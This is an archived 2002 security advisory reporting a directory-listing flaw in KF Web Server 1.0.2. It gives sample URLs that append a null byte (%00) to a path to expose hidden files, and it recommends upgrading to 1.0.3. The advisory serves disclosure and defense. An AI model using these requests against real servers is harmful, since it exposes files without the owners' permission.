TUCoPS :: Web :: Servers :: web5515.htm

KF Web Server shows file and directory content
8th Jul 2002 [SBWID-5515]
COMMAND

	KF Web Server shows file and directory content

SYSTEMS AFFECTED

	KF Web Server version 1.0.2

PROBLEM

	Thanks  to  Arnaud  Jacques   aka   scrap   [webmaster@securiteinfo.com]
	[http://www.securiteinfo.com] message :
	

	If the requested URL contains a %00 after a  directory  name,  then  the
	server shows all files in the directory content. A hacker  can  see  all
	hidden (non-HTML linked) files and directories on the server.
	

	 .oO  Exploit Oo.

	

	The exploit is really easy. You can do it with any browser Examples :
	

	http://server_name/index.html : Normal use.

	http://server_name/%00 : You get the vulnerability.

	http://server_name/index.html%00 : Is *not* vulnerable.

	http://server_name/%00index.html : You get the vulnerability. In fact everything after %00 is ignored.

	http://server_name/subdir/%00 : You get the vulnerability.

	

SOLUTION

	Upgrade to KF Web Server version 1.0.3
	

	http://www.keyfocus.net/kfws/download/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH